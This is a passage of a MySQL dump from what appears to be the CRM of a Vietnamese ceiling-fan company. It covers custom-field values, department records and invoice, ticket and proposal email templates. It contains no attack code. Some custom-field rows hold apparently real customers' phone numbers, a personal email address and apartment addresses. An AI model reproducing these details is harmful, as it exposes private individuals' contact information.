(6, 'credit_note', 'Email', 'credit_note_email', 0, 'input', '', 0, 0, 0, 1, 0, 0, 1, 1, 0, 12, ''),
(7, 'estimate', 'Tên/SĐT', 'estimate_hotline_lien_he', 1, 'number', '', 0, 0, 1, 1, 0, 0, 1, 1, 0, 12, ''),
(9, 'customers', 'NGÀY SINH NHẬT', 'customers_birthday', 0, 'date_picker', '', 0, 0, 1, 0, 0, 0, 0, 0, 0, 12, '');

-- --------------------------------------------------------

--
-- Table structure for table `tblcustomfieldsvalues`
--

CREATE TABLE `tblcustomfieldsvalues` (
  `id` int(11) NOT NULL,
  `relid` int(11) NOT NULL,
  `fieldid` int(11) NOT NULL,
  `fieldto` varchar(15) NOT NULL,
  `value` text NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblcustomfieldsvalues`
--

INSERT INTO `tblcustomfieldsvalues` (`id`, `relid`, `fieldid`, `fieldto`, `value`) VALUES
(2, 1, 2, 'estimate', 'dự án'),
(3, 2, 2, 'estimate', 'Bình Dương - Nhà máy'),
(4, 2, 5, 'estimate', 'congho@live.com'),
(5, 2, 7, 'estimate', '0989343363'),
(7, 3, 2, 'estimate', 'Khu vực sảnh sự kiện - RMIT'),
(8, 5, 2, 'estimate', 'Lắp đặt dự án'),
(16, 10, 2, 'estimate', 'Lắp đặt 04 quạt trần Abacus 60 - 808'),
(17, 17, 2, 'estimate', 'Lắp nhà xưởng - May Dệt'),
(18, 18, 2, 'estimate', 'Bán lẻ nhà xưởng - May mặc'),
(19, 19, 2, 'estimate', 'Bán lẻ lắp nhà ở'),
(20, 20, 2, 'estimate', 'Lắp đặt - Bán lẻ Nhà ở'),
(21, 12, 2, 'estimate', 'Lắp đặt Nhà Ở'),
(22, 21, 2, 'estimate', 'Lắp đặt dự án'),
(23, 23, 2, 'estimate', 'Lắp đặt nhà ở - Quận 7 - PMH'),
(24, 24, 2, 'estimate', 'Lắp đặt Khu Phố Bình Trưng Tây - Q2 (gần Đảo Kim Cương)'),
(25, 34, 2, 'estimate', 'Nhà ở'),
(26, 35, 2, 'estimate', 'Nhà ở bán lẻ'),
(27, 36, 2, 'estimate', 'Lắp đặt quạt nhà ở chung cư'),
(29, 38, 2, 'estimate', 'Cung cấp - lắp đặt quạt trần Essence 3m - Phòng Tập Võ'),
(30, 42, 2, 'estimate', 'Nhà Ở - Nhà Phố'),
(31, 44, 2, 'estimate', 'Lắp nhà ở'),
(32, 46, 2, 'estimate', 'Nhà chung cư - Phòng ngủ (Phòng Khách)'),
(33, 48, 2, 'estimate', 'Giao hàng mẫu - FREE'),
(34, 51, 2, 'estimate', 'Bán buôn (Hoàng Seller)'),
(35, 54, 2, 'estimate', 'Khách Lẻ'),
(36, 55, 2, 'estimate', 'Dự án Nhà Máy SX Lắp Ráp - Hồng Đức'),
(37, 57, 2, 'estimate', 'Khách Lẻ - Hà Nội'),
(39, 62, 2, 'estimate', 'Bán lẻ -'),
(40, 63, 2, 'estimate', 'Sữa chữa Bảo Dưỡng'),
(41, 64, 2, 'estimate', 'Khách Lẻ'),
(42, 72, 2, 'estimate', 'Khách Lẻ'),
(43, 73, 2, 'estimate', 'Báo lẻ Điều Khiển'),
(44, 74, 2, 'estimate', 'Lắp đặt khách lẻ - CC Chung cư saigon south, Quận 7'),
(45, 75, 2, 'estimate', 'Khách hàng lẻ'),
(47, 79, 2, 'estimate', 'Khách lẻ'),
(48, 84, 2, 'estimate', 'Bán lẻ'),
(50, 87, 2, 'estimate', 'Khách lẻ'),
(51, 88, 2, 'estimate', 'Bán lẻ 5 bộ SINO Màu Maple Wood, White'),
(52, 89, 2, 'estimate', 'Haiku H'),
(53, 1, 4, 'warehouse_name', '304 TVB, TML, Tp Thủ Đức, Tp Hồ Chí Minh'),
(55, 90, 2, 'estimate', 'Cung cấp lắp đặt nhà thờ - Cha Ny - Biên Hoà'),
(56, 92, 2, 'estimate', 'Khách hàng mua lẻ - Tại Hà Nội'),
(57, 94, 2, 'estimate', 'Lắp đặt nhà thờ Giáo Xứ'),
(58, 99, 2, 'estimate', 'Khách bán lẻ - lắp nhà chung cư'),
(59, 100, 2, 'estimate', 'Khách lẻ - lắp đặt nhà chung cư - trần gỗ'),
(60, 101, 2, 'estimate', 'Bán lẻ - Khách hàng tự lắp đặt'),
(61, 102, 2, 'estimate', 'Thay bộ điều khiển từ xa - 5 cấp ONIX'),
(62, 103, 2, 'estimate', 'Khách lẻ - Đồng Nai'),
(63, 106, 2, 'estimate', 'Khách lẻ lắp chung cư'),
(64, 107, 2, 'estimate', 'Báo giá'),
(65, 108, 2, 'estimate', 'Khách lẻ lắp đặt trần chung cư'),
(66, 109, 2, 'estimate', 'Residential - Liên hệ lắp đặt: Ms.Mai - 0977048284'),
(67, 110, 2, 'estimate', 'Sửa chửa lắp đặt thay mới điều khiển'),
(68, 111, 2, 'estimate', 'Cung cấp giao hàng'),
(69, 112, 2, 'estimate', 'Cung cấp giao hàng Phú Thọ'),
(70, 113, 2, 'estimate', 'Mua đèn LED - TOBAGO'),
(71, 114, 2, 'estimate', 'Cung cấp điều khiển quạt 3 tốc độ'),
(72, 116, 2, 'estimate', 'Quạt trần cánh gỗ ONIX'),
(73, 117, 2, 'estimate', 'Cung cấp - Lắp đặt ONIX'),
(74, 119, 2, 'estimate', 'Villa - Long An'),
(75, 120, 2, 'estimate', 'Bán lẻ - Khách quận 7'),
(76, 121, 2, 'estimate', 'Bán lẻ bộ điều khiển'),
(77, 122, 2, 'estimate', 'Bán lẻ Điều khiển'),
(78, 124, 2, 'estimate', 'Bán lẻ - lắp nhà chung cư'),
(79, 126, 2, 'estimate', 'Cung cấp cho Villa - Bà Rịa Vũng Tàu'),
(80, 132, 2, 'estimate', 'Mua thêm 2 mẫu KATRINA LED DARK WALNUT'),
(81, 133, 2, 'estimate', 'Quạt trần SINO 52'),
(82, 140, 2, 'estimate', 'Lắp đặt quạt trần'),
(84, 149, 2, 'estimate', 'Bán lẻ hàng mẫu'),
(86, 201, 2, 'estimate', 'Bán lẻ - lắp đặt trần chung cư Sarica B.04-04, Phường An Lợi Đông, Tp. Thủ Đức, TPHCM'),
(88, 256, 7, 'estimate', '0909899367');

-- --------------------------------------------------------

--
-- Table structure for table `tblday_off`
--

CREATE TABLE `tblday_off` (
  `id` int(11) NOT NULL,
  `off_reason` varchar(255) NOT NULL,
  `off_type` varchar(100) NOT NULL,
  `break_date` date NOT NULL,
  `timekeeping` varchar(45) DEFAULT NULL,
  `department` int(11) DEFAULT 0,
  `position` int(11) DEFAULT 0,
  `add_from` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tbldepartments`
--

CREATE TABLE `tbldepartments` (
  `departmentid` int(11) NOT NULL,
  `name` varchar(100) NOT NULL,
  `imap_username` varchar(191) DEFAULT NULL,
  `email` varchar(100) DEFAULT NULL,
  `email_from_header` tinyint(1) NOT NULL DEFAULT 0,
  `host` varchar(150) DEFAULT NULL,
  `password` mediumtext DEFAULT NULL,
  `encryption` varchar(3) DEFAULT NULL,
  `folder` varchar(191) NOT NULL DEFAULT 'INBOX',
  `delete_after_import` int(11) NOT NULL DEFAULT 0,
  `calendar_id` mediumtext DEFAULT NULL,
  `hidefromclient` tinyint(1) NOT NULL DEFAULT 0,
  `manager_id` int(11) DEFAULT 0,
  `parent_id` int(11) DEFAULT 0
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tbldepartments`
--

INSERT INTO `tbldepartments` (`departmentid`, `name`, `imap_username`, `email`, `email_from_header`, `host`, `password`, `encryption`, `folder`, `delete_after_import`, `calendar_id`, `hidefromclient`, `manager_id`, `parent_id`) VALUES
(1, 'Phòng Kỹ Thuật', '', 'hotro@hogiaphat.vn', 0, '', '', '', 'INBOX', 0, '', 0, 0, 0),
(2, 'Phòng Tư vấn Bán hàng', '', 'sale@hogiaphat.vn', 0, '', '', '', 'INBOX', 0, '', 0, 0, 0),
(3, ' Phòng Kế Toán', 'hogiaphatco@gmail.com', 'ketoan@hogiaphat.vn', 0, '', '', '', 'INBOX', 0, '', 0, 0, 0),
(4, 'Bộ phận nhân sự - kế toán', '', 'info@hogiaphat.vn', 0, '', '', '', 'INBOX', 0, '', 1, 0, 0);

-- --------------------------------------------------------

--
-- Table structure for table `tbldismissed_announcements`
--

CREATE TABLE `tbldismissed_announcements` (
  `dismissedannouncementid` int(11) NOT NULL,
  `announcementid` int(11) NOT NULL,
  `staff` int(11) NOT NULL,
  `userid` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tbldismissed_announcements`
--

INSERT INTO `tbldismissed_announcements` (`dismissedannouncementid`, `announcementid`, `staff`, `userid`) VALUES
(5, 1, 1, 1);

-- --------------------------------------------------------

--
-- Table structure for table `tblemaillists`
--

CREATE TABLE `tblemaillists` (
  `listid` int(11) NOT NULL,
  `name` mediumtext NOT NULL,
  `creator` varchar(100) NOT NULL,
  `datecreated` datetime NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblemailtemplates`
--

CREATE TABLE `tblemailtemplates` (
  `emailtemplateid` int(11) NOT NULL,
  `type` mediumtext NOT NULL,
  `slug` varchar(100) NOT NULL,
  `language` varchar(40) DEFAULT NULL,
  `name` mediumtext NOT NULL,
  `subject` mediumtext NOT NULL,
  `message` mediumtext NOT NULL,
  `fromname` mediumtext NOT NULL,
  `fromemail` varchar(100) DEFAULT NULL,
  `plaintext` int(11) NOT NULL DEFAULT 0,
  `active` tinyint(4) NOT NULL DEFAULT 0,
  `order` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblemailtemplates`
--

INSERT INTO `tblemailtemplates` (`emailtemplateid`, `type`, `slug`, `language`, `name`, `subject`, `message`, `fromname`, `fromemail`, `plaintext`, `active`, `order`) VALUES
(1, 'client', 'new-client-created', 'english', 'New Contact Added/Registered (Welcome Email)', 'Welcome aboard', 'Dear {contact_firstname} {contact_lastname}<br /><br />Thank you for registering on the <strong>{companyname}</strong> CRM System.<br /><br />We just wanted to say welcome.<br /><br />Please contact us if you need any help.<br /><br />Click here to view your profile: <a href=\"{crm_url}\">{crm_url}</a><br /><br />Kind Regards, <br />{email_signature}<br /><br />(This is an automated email, so please don\'t reply to this email address)', '{companyname} | CRM', '', 0, 0, 0),
(2, 'invoice', 'invoice-send-to-client', 'english', 'Send Invoice to Customer', 'Hoa don so {invoice_number}', '<span style=\"font-size: 12pt;\">Dear {contact_firstname} {contact_lastname}</span><br /><br /><span style=\"font-size: 12pt;\">We have prepared the following invoice for you: <strong># {invoice_number}</strong></span><br /><br /><span style=\"font-size: 12pt;\"><strong>Invoice status</strong>: {invoice_status}</span><br /><br /><span style=\"font-size: 12pt;\">You can view the invoice on the following link: <a href=\"{invoice_link}\">{invoice_number}</a></span><br /><br /><span style=\"font-size: 12pt;\"><span style=\"font-size: 12pt;\">Please contact us for more information.<br />----------------------------------------<br /></span></span>\r\n<p class=\"p1\">NH&Agrave; CUNG CẤP QUẠT TRẦN UY T&Iacute;N CHẤT LƯỢNG CAO</p>\r\n<p class=\"p1\">', '{companyname} | CRM', '', 0, 0, 0),
(3, 'ticket', 'new-ticket-opened-admin', 'english', 'New Ticket Opened (Opened by Staff, Sent to Customer)', 'Yêu cầu Hỗ Trợ Mới gởi đến bạn', '<span style=\"font-size: 12pt;\">Hi {contact_firstname} {contact_lastname}</span><br /><br />Y&ecirc;u cầu hỗ trợ mới đ&atilde; được tạo ra.<br /><br /><span style=\"font-size: 12pt;\"><strong>T&ecirc;n y&ecirc;u cầu:</strong> {ticket_subject}</span><br /><span style=\"font-size: 12pt;\"><strong>Ph&ograve;ng ban:</strong> {ticket_department}</span><br /><span style=\"font-size: 12pt;\"><strong>Mức độ ưu ti&ecirc;n:</strong> {ticket_priority}<br /></span><br /><span style=\"font-size: 12pt;\"><strong>Tin nhắn:</strong></span><br /><span style=\"font-size: 12pt;\">{ticket_message}</span><br /><br /><span style=\"font-size: 12pt;\">You can view the ticket on the following link: <a href=\"{ticket_public_url}\">#{ticket_id}</a><br /><br />Kind Regards,</span><br /><span style=\"font-size: 12pt;\">{email_signature}</span>', '{companyname} | CRM', '', 0, 1, 0),
(4, 'ticket', 'ticket-reply', 'english', 'Ticket Reply (Sent to Customer)', 'Hỗ trợ khách hàng | Phản hồi thông tin | Tổ chức đào tạo WIT', '<span style=\"font-size: 12pt;\">Hi {contact_firstname} {contact_lastname}</span><br /><br /><span style=\"font-size: 12pt;\">Bạn c&oacute; một hỗ trợ mới được phản hồi&nbsp;<a href=\"{ticket_public_url}\">#{ticket_id}</a></span><br /><br /><span style=\"font-size: 12pt;\"><strong>Ti&ecirc;u đề hỗ trợ:</strong> {ticket_subject}<br /></span><br /><span style=\"font-size: 12pt;\"><strong>Tin nhắn hỗ trợ:</strong></span><br /><span style=\"font-size: 12pt;\">{ticket_message}</span><br /><br /><span style=\"font-size: 12pt;\">Bạn c&oacute; thể xem hỗ trợ tr&ecirc;n li&ecirc;n kết sau: <a href=\"{ticket_public_url}\">#{ticket_id}</a></span><br /><br /><span style=\"font-size: 12pt;\">Kind Regards,<br />{dark_logo_image_with_url}</span><br /><span style=\"font-size: 12pt;\">{email_signature}</span>', '{companyname} | CRM', '', 0, 1, 0),
(5, 'ticket', 'ticket-autoresponse', 'english', 'New Ticket Opened - Autoresponse', 'Phản hồi hỗ trợ khách hàng | Đã được tạo mới ', '<span style=\"font-size: 12pt;\">Hi {contact_firstname} {contact_lastname}</span><br /><br />Cảm ơn bạn đ&atilde; li&ecirc;n hệ với nh&oacute;m hỗ trợ của ch&uacute;ng t&ocirc;i. Một y&ecirc;u cầu hỗ trợ hiện đ&atilde; được mở theo y&ecirc;u cầu của bạn. Bạn sẽ được th&ocirc;ng b&aacute;o khi c&oacute; phản hồi qua email.<br /><br /><span style=\"font-size: 12pt;\"><strong>Ti&ecirc;u đề:</strong> {ticket_subject}</span><br /><span style=\"font-size: 12pt;\"><strong>Nh&oacute;m l&agrave;m việc</strong>: {ticket_department}</span><br /><span style=\"font-size: 12pt;\"><strong>Mức độ ưu ti&ecirc;n:</strong> {ticket_priority}</span><br /><br /><span style=\"font-size: 12pt;\"><strong>Tin nhắn:</strong></span><br /><span style=\"font-size: 12pt;\">{ticket_message}<br /></span><br /><span style=\"font-size: 12pt;\">Bạn c&oacute; thể xem v&eacute; tr&ecirc;n li&ecirc;n kết sau: <a href=\"{ticket_public_url}\">#{ticket_id}</a></span><br /><br /><span style=\"font-size: 12pt;\">Kind Regards,<br />{dark_logo_image_with_url}</span><br /><span style=\"font-size: 12pt;\">{email_signature}</span>', '{companyname} | CRM', '', 0, 1, 0),
(6, 'invoice', 'invoice-payment-recorded', 'english', 'Invoice Payment Recorded (Sent to Customer)', 'Xác nhận thanh toán - WIT', '<span style=\"font-size: 12pt;\">Hello {contact_firstname}&nbsp;{contact_lastname}<br /><br /></span>Thank you for the payment. Find the payment details below:<br /><br />-------------------------------------------------<br /><br />Amount:&nbsp;<strong>{payment_total}<br /></strong>Date:&nbsp;<strong>{payment_date}</strong><br />Invoice number:&nbsp;<span style=\"font-size: 12pt;\"><strong># {invoice_number}<br /><br /></strong></span>-------------------------------------------------<br /><br />You can always view the invoice for this payment at the following link:&nbsp;<a href=\"{invoice_link}\"><span style=\"font-size: 12pt;\">{invoice_number}</span></a><br /><br />We are looking forward working with you.<br /><br /><span style=\"font-size: 12pt;\">Kind Regards,</span><br /><span style=\"font-size: 12pt;\">{email_signature}</span>', '{companyname} | CRM', '', 0, 1, 0),
(7, 'invoice', 'invoice-overdue-notice', 'english', 'Invoice Overdue Notice', 'Invoice Overdue Notice - {invoice_number}', '<span style=\"font-size: 12pt;\">Hi {contact_firstname} {contact_lastname}</span><br /><br /><span style=\"font-size: 12pt;\">This is an overdue notice for invoice <strong># {invoice_number}</strong></span><br /><br /><span style=\"font-size: 12pt;\">This invoice was due: {invoice_duedate}</span><br /><br /><span style=\"font-size: 12pt;\">You can view the invoice on the following link: <a href=\"{invoice_link}\">{invoice_number}</a></span><br /><br /><span style=\"font-size: 12pt;\">Kind Regards,</span><br /><span style=\"font-size: 12pt;\">{email_signature}</span>', '{companyname} | CRM', '', 0, 1, 0),
(8, 'invoice', 'invoice-already-send', 'english', 'Invoice Already Sent to Customer', 'Invoice # {invoice_number} ', '<span style=\"font-size: 12pt;\">Hi {contact_firstname} {contact_lastname}</span><br /><br /><span style=\"font-size: 12pt;\">At your request, here is the invoice with number <strong># {invoice_number}</strong></span><br /><br /><span style=\"font-size: 12pt;\">You can view the invoice on the following link: <a href=\"{invoice_link}\">{invoice_number}</a></span><br /><br /><span style=\"font-size: 12pt;\">Please contact us for more information.</span><br /><br /><span style=\"font-size: 12pt;\">Kind Regards,</span><br /><span style=\"font-size: 12pt;\">{email_signature}</span>', '{companyname} | CRM', '', 0, 0, 0),
(9, 'ticket', 'new-ticket-created-staff', 'english', 'New Ticket Created (Opened by Customer, Sent to Staff Members)', 'Đã tạo một yêu cầu Hỗ trợ mới | Tổ chức đào tạo WIT', 'Một y&ecirc;u cầu hỗ trợ mới đ&atilde; được tạo ra.<br /><br /><span style=\"font-size: 12pt;\"><strong>T&ecirc;n</strong>: {ticket_subject}</span><br /><span style=\"font-size: 12pt;\"><strong>Ph&ograve;ng ban</strong>: {ticket_department}</span><br /><span style=\"font-size: 12pt;\"><strong>Mức độ ưu ti&ecirc;n</strong>: {ticket_priority}<br /></span><br /><span style=\"font-size: 12pt;\"><strong>Tin nhắn hỗ trợ:</strong></span><br /><span style=\"font-size: 12pt;\">{ticket_message}</span><br /><br /><span style=\"font-size: 12pt;\">You can view the ticket on the following link: <a href=\"{ticket_url}\">#{ticket_id}</a></span><br /><span style=\"font-size: 12pt;\">Kind Regards,</span><br /><span style=\"font-size: 12pt;\">{email_signature}</span>', '{companyname} | CRM', '', 0, 1, 0),
(10, 'estimate', 'estimate-send-to-client', 'english', 'Send Estimate to Customer', 'Yeu cau bao gia So: # {estimate_number} ', '<span style=\"font-size: 12pt;\">Dear {contact_firstname} {contact_lastname}</span><br /><br /><span style=\"font-size: 12pt;\">Please find the attached estimate <strong># {estimate_number}</strong></span><br /><br /><span style=\"font-size: 12pt;\"><strong>Estimate status:</strong> {estimate_status}</span><br /><br /><span style=\"font-size: 12pt;\">You can view the estimate on the following link: <a href=\"{estimate_link}\">{estimate_number}</a></span><br /><br /><span style=\"font-size: 12pt;\">We look forward to your communication.</span><br /><br /><span style=\"font-size: 12pt;\">Kind Regards,</span><br /><span style=\"font-size: 12pt;\">{email_signature}<br /></span>', '{companyname} |  yêu cầu', '', 0, 0, 0),
(11, 'ticket', 'ticket-reply-to-admin', 'english', 'Ticket Reply (Sent to Staff)', 'Trả lời mới | Yêu cầu hỗ trợ', '<span style=\"font-size: 12pt;\">Một c&acirc;u trả lời mới của y&ecirc;u cầu hỗ trợ mới từ {contact_firstname} {contact_lastname}</span><br /><br /><span style=\"font-size: 12pt;\"><strong>Ti&ecirc;u đề</strong>: {ticket_subject}</span><br /><span style=\"font-size: 12pt;\"><strong>Ph&ograve;ng ban</strong>: {ticket_department}</span><br /><span style=\"font-size: 12pt;\"><strong>Mức độ ưu ti&ecirc;n</strong>: {ticket_priority}</span><br /><br /><span style=\"font-size: 12pt;\"><strong>Tin nhắn:</strong></span><br /><span style=\"font-size: 12pt;\">{ticket_message}</span><br /><br /><span style=\"font-size: 12pt;\">Bạn c&oacute; thể xem y&ecirc;u cầu tr&ecirc;n li&ecirc;n kết sau: <a href=\"{ticket_url}\">#{ticket_id}</a></span><br /><br /><span style=\"font-size: 12pt;\">Kind Regards,</span><br /><span style=\"font-size: 12pt;\">{email_signature}</span>', '{companyname} | CRM', '', 0, 1, 0),
(12, 'estimate', 'estimate-already-send', 'english', 'Estimate Already Sent to Customer', 'Estimate # {estimate_number} ', '<span style=\"font-size: 12pt;\">Dear {contact_firstname} {contact_lastname}</span><br /><br /><span style=\"font-size: 12pt;\">Thank you for your estimate request.</span><br /><br /><span style=\"font-size: 12pt;\">You can view the estimate on the following link: <a href=\"{estimate_link}\">{estimate_number}</a></span><br /><br />----------------------------------------<br />\r\n<p class=\"p1\">NH&Agrave; CUNG CẤP QUẠT TRẦN UY T&Iacute;N CHẤT LƯỢNG CAO</p>\r\n<p class=\"p1\">', '{companyname} | CRM', '', 0, 0, 0),
(13, 'contract', 'contract-expiration', 'english', 'Contract Expiration Reminder (Sent to Customer Contacts)', 'Contract Expiration Reminder', '<span style=\"font-size: 12pt;\">Dear {client_company}</span><br /><br /><span style=\"font-size: 12pt;\">This is a reminder that the following contract will expire soon:</span><br /><br /><span style=\"font-size: 12pt;\"><strong>Subject:</strong> {contract_subject}</span><br /><span style=\"font-size: 12pt;\"><strong>Description:</strong> {contract_description}</span><br /><span style=\"font-size: 12pt;\"><strong>Date Start:</strong> {contract_datestart}</span><br /><span style=\"font-size: 12pt;\"><strong>Date End:</strong> {contract_dateend}</span><br /><br /><span style=\"font-size: 12pt;\">Please contact us for more information.</span><br /><br /><span style=\"font-size: 12pt;\">Kind Regards,</span><br /><span style=\"font-size: 12pt;\">{email_signature}</span>', '{companyname} | CRM', '', 0, 0, 0),
(14, 'tasks', 'task-assigned', 'english', 'New Task Assigned (Sent to Staff)', 'NHIỆM VỤ MỚI được giao - {task_name}', '<span style=\"font-size: 12pt;\">Dear {staff_firstname}</span><br /><br /><span style=\"font-size: 12pt;\">Bạn đ&atilde; được giao cho một nhiệm vụ mới:</span><br /><br /><span style=\"font-size: 12pt;\"><strong>T&ecirc;n:</strong> {task_name}<br /></span><strong>Ng&agrave;y bắt đầu:</strong> {task_startdate}<br /><span style=\"font-size: 12pt;\"><strong>Ng&agrave;y kết th&uacute;c:</strong> {task_duedate}</span><br /><span style=\"font-size: 12pt;\"><strong>Mức độ ưu ti&ecirc;n:</strong> {task_priority}<br /><br /></span><span style=\"font-size: 12pt;\">Bạn c&oacute; thể xem nhiệm vụ tr&ecirc;n li&ecirc;n kết sau: <a href=\"{task_link}\">{task_name}</a></span><br /><br /><span style=\"font-size: 12pt;\">Kind Regards,</span><br /><span style=\"font-size: 12pt;\">{email_signature}</span>', '{companyname} | CRM', '', 0, 1, 0),
(15, 'tasks', 'task-added-as-follower', 'english', 'Staff Member Added as Follower on Task (Sent to Staff)', 'Bạn được thêm làm người theo dõi trong nhiệm vụ  - {task_name}', '<span style=\"font-size: 12pt;\">Hi {staff_firstname}<br /></span><br /><span style=\"font-size: 12pt;\">Bạn đ&atilde; được th&ecirc;m l&agrave;m người theo d&otilde;i trong nhiệm vụ sau:</span><br /><span style=\"font-size: 12pt;\"><strong><br />T&ecirc;n nhiệm vụ:</strong> {task_name}</span><br /><span style=\"font-size: 12pt;\"><strong>Ng&agrave;y bắt đầu:</strong> {task_startdate}</span><br /><br /><span>Bạn c&oacute; thể xem nhiệm vụ tr&ecirc;n li&ecirc;n kết sau: </span><a href=\"{task_link}\">{task_name}</a><br /><br /><span style=\"font-size: 12pt;\">Kind Regards,</span><br /><span style=\"font-size: 12pt;\">{email_signature}</span>', '{companyname} | CRM', '', 0, 1, 0),
(16, 'tasks', 'task-commented', 'english', 'New Comment on Task (Sent to Staff)', 'New Comment on Task - {task_name}', 'Dear {staff_firstname}<br /><br />A comment has been made on the following task:<br /><br /><strong>Name:</strong> {task_name}<br /><strong>Comment:</strong> {task_comment}<br /><br />You can view the task on the following link: <a href=\"{task_link}\">{task_name}</a><br /><br />Kind Regards,<br />{email_signature}', '{companyname} | CRM', '', 0, 1, 0),
(17, 'tasks', 'task-added-attachment', 'english', 'New Attachment(s) on Task (Sent to Staff)', 'New Attachment on Task - {task_name}', 'Hi {staff_firstname}<br /><br /><strong>{task_user_take_action}</strong> added an attachment on the following task:<br /><br /><strong>Name:</strong> {task_name}<br /><br />You can view the task on the following link: <a href=\"{task_link}\">{task_name}</a><br /><br />Kind Regards,<br />{email_signature}', '{companyname} | CRM', '', 0, 1, 0),
(18, 'estimate', 'estimate-declined-to-staff', 'english', 'Estimate Declined (Sent to Staff)', 'Customer Declined Estimate', '<span style=\"font-size: 12pt;\">Hi</span><br /> <br /><span style=\"font-size: 12pt;\">Customer ({client_company}) declined estimate with number <strong># {estimate_number}</strong></span><br /> <br /><span style=\"font-size: 12pt;\">You can view the estimate on the following link: <a href=\"{estimate_link}\">{estimate_number}</a></span><br /> <br /><span style=\"font-size: 12pt;\">{email_signature}</span>', '{companyname} | CRM', '', 0, 1, 0),
(19, 'estimate', 'estimate-accepted-to-staff', 'english', 'Estimate Accepted (Sent to Staff)', 'Customer Accepted Estimate', '<span style=\"font-size: 12pt;\">Hi</span><br /> <br /><span style=\"font-size: 12pt;\">Customer ({client_company}) accepted estimate with number <strong># {estimate_number}</strong></span><br /> <br /><span style=\"font-size: 12pt;\">You can view the estimate on the following link: <a href=\"{estimate_link}\">{estimate_number}</a></span><br /> <br /><span style=\"font-size: 12pt;\">{email_signature}</span>', '{companyname} | CRM', '', 0, 1, 0),
(20, 'proposals', 'proposal-client-accepted', 'english', 'Customer Action - Accepted (Sent to Staff)', 'Customer Accepted Proposal', '<div>Hi<br /> <br />Client <strong>{proposal_proposal_to}</strong> accepted the following proposal:<br /> <br /><strong>Number:</strong> {proposal_number}<br /><strong>Subject</strong>: {proposal_subject}<br /><strong>Total</strong>: {proposal_total}<br /> <br />View the proposal on the following link: <a href=\"{proposal_link}\">{proposal_number}</a><br /> <br />Kind Regards,<br />{email_signature}</div>\r\n<div>&nbsp;</div>\r\n<div>&nbsp;</div>\r\n<div>&nbsp;</div>', '{companyname} | CRM', '', 0, 1, 0),
(21, 'proposals', 'proposal-send-to-customer', 'english', 'Send Proposal to Customer', 'De xuat bao gia so {proposal_number} - Tổ chức đào tạo WIT nhà cung cấp quạt mát toàn diện', 'Dear {proposal_proposal_to}<br /><br />Vui l&ograve;ng t&igrave;m đề xuất đ&iacute;nh k&egrave;m của ch&uacute;ng t&ocirc;i.<br /><br />Đề xuất n&agrave;y c&oacute; hiệu lực cho đến khi: {proposal_open_till}<br />Bạn c&oacute; thể xem đề xuất tr&ecirc;n li&ecirc;n kết sau: <a href=\"{proposal_link}\">{proposal_number}</a><br /><br />Vui l&ograve;ng b&igrave;nh luận trực tuyến nếu bạn c&oacute; bất kỳ c&acirc;u hỏi n&agrave;o.<br /><br />Ch&uacute;ng t&ocirc;i mong muốn th&ocirc;ng tin li&ecirc;n lạc của bạn.<br /><br />----------------------------------------<br />\r\n<p class=\"p1\">NH&Agrave; CUNG CẤP QUẠT TRẦN UY T&Iacute;N CHẤT LƯỢNG CAO</p>\r\n<p class=\"p1\">', '{companyname} | Tổ chức đào tạo WIT', '', 0, 0, 0),
(22, 'proposals', 'proposal-client-declined', 'english', 'Customer Action - Declined (Sent to Staff)', 'Client Declined Proposal', 'Hi<br /> <br />Customer <strong>{proposal_proposal_to}</strong> declined the proposal <strong>{proposal_subject}</strong><br /> <br />View the proposal on the following link <a href=\"{proposal_link}\">{proposal_number}</a>&nbsp;or from the admin area.<br /> <br />Kind Regards,<br />{email_signature}', '{companyname} | CRM', '', 0, 1, 0),
(23, 'proposals', 'proposal-client-thank-you', 'english', 'Thank You Email (Sent to Customer After Accept)', 'Thank for you accepting proposal', 'Dear {proposal_proposal_to}<br /> <br />Thank for for accepting the proposal.<br /> <br />We look forward to doing business with you.<br /> <br />We will contact you as soon as possible<br /> <br />Kind Regards,<br />{email_signature}', '{companyname} | CRM', '', 0, 1, 0),
(24, 'proposals', 'proposal-comment-to-client', 'english', 'New Comment  (Sent to Customer/Lead)', 'New Proposal Comment', 'Dear {proposal_proposal_to}<br /> <br />A new comment has been made on the following proposal: <strong>{proposal_number}</strong><br /> <br />You can view and reply to the comment on the following link: <a href=\"{proposal_link}\">{proposal_number}</a><br /> <br />Kind Regards,<br />{email_signature}', '{companyname} | CRM', '', 0, 1, 0),
(25, 'proposals', 'proposal-comment-to-admin', 'english', 'New Comment (Sent to Staff) ', 'New Proposal Comment', 'Hi<br /> <br />A new comment has been made to the proposal <strong>{proposal_subject}</strong><br /> <br />You can view and reply to the comment on the following link: <a href=\"{proposal_link}\">{proposal_number}</a>&nbsp;or from the admin area.<br /> <br />{email_signature}', '{companyname} | CRM', '', 0, 1, 0),
(26, 'estimate', 'estimate-thank-you-to-customer', 'english', 'Thank You Email (Sent to Customer After Accept)', 'Thank for you accepting estimate', '<span style=\"font-size: 12pt;\">Dear {contact_firstname} {contact_lastname}</span><br /><br /><span style=\"font-size: 12pt;\">Thank for for accepting the estimate.</span><br /><br /><span style=\"font-size: 12pt;\">We look forward to doing business with you.</span><br /><br /><span style=\"font-size: 12pt;\"><span style=\"font-size: 12pt;\">We will contact you as soon as possible.<br /><br />----------------------------------------</span></span>\r\n<p class=\"p1\">NH&Agrave; CUNG CẤP QUẠT TRẦN UY T&Iacute;N CHẤT LƯỢNG CAO</p>', '{companyname} | CRM', '', 0, 1, 0),
